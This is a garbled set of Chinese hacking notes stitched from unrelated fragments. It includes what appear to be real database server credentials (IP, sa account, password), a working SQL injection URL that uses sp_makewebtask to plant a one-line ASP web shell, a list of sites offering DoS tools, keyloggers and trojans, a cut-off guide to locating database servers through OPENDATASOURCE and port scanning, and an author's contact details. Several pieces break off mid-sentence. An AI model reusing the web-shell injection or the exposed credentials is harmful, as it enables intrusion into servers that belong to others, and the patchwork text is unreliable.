数据库服务器 10.0.5.195
帐户 sa
密码 accountbase
数据库名 gameaccount_server
<%
strSQLServerName = "10.0.5.195" '服务器名称或地址
strSQLDBUserName = "sa" '数据库帐号
strSQLDBPassword = "accountbase" '数据库密码
strSQLDBName = "gameaccount_server" '数据库名称
Set conn = Server.CreateObject("ADODB.Connection")
strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQ

用sp_makewebtask直接在web目录里写入一句话马,条件是要sa权限和站点的web路径.
http://127.0.0.1/xxx.asp?id=123';exec%20sp_makewebtask%20'd:\www\xxx\xxx.asp','%20select%20''
<%25execute(request("cn"))%25>''%20';--
select中的双单引号起着重定义的作用

allhack.com
本网站提供了图书馆及下载专区。该图书馆为初学者提供了黑客知识和计算机技术基础知识。下载区包括了扫描工具，FLOOD工具，解密工具，

拒绝服务攻击等。
alw.nih,gov
在安全目录下有大量的安全工具
anticode.com
入侵攻击，拒绝服务攻击，密钥记录器，邮件炸弹，最流行的IRC客户程序脚本，扫描器，嗅探器，口令解密器，木马等程序。此网站更新及时

，而且维护也很好
auscert.org.au
澳大利亚电脑紧急反应小组，包括大量入侵攻击及其工作原理的信息。
astalav

其实.即使数据库和WEB不在一块还是有机会搞的.并不是说一点机会没.一般服务器装好系统什么的.都会装个IIS吧？列他C盘.看看有没有Inetpub这个目录.就知道他有没有装IIS了.但是.不知道他IP也？怎么办呢？可以这样来，PING一下WEB服务器.扫他这一C段的1433端口.看看哪台开了.不过这方法也不好.现在很多主机都启用了防火墙.1433端口就算开了你也扫不着.这该怎么办呢？可以利用opendatasource宏让对方的SQL与自己的数据库建立连接.既然能建立连接.就可以得到数据库服务器的IP地址了.我们来试试看.有几个前提得说一下.第一.你机器必须

非常熟悉,开发出各项安全测试工具,后来转向中间语言.NET J2EE领域,现从事BI商业智能企业构架,对数据仓库设计与

数据挖掘技术有深入的研究
SPECIALTY: DataMining
E-MAIL: kj021320@126.com
QQ: 282720807
BLOG: http://blog.csdn.net/kj021320/

---------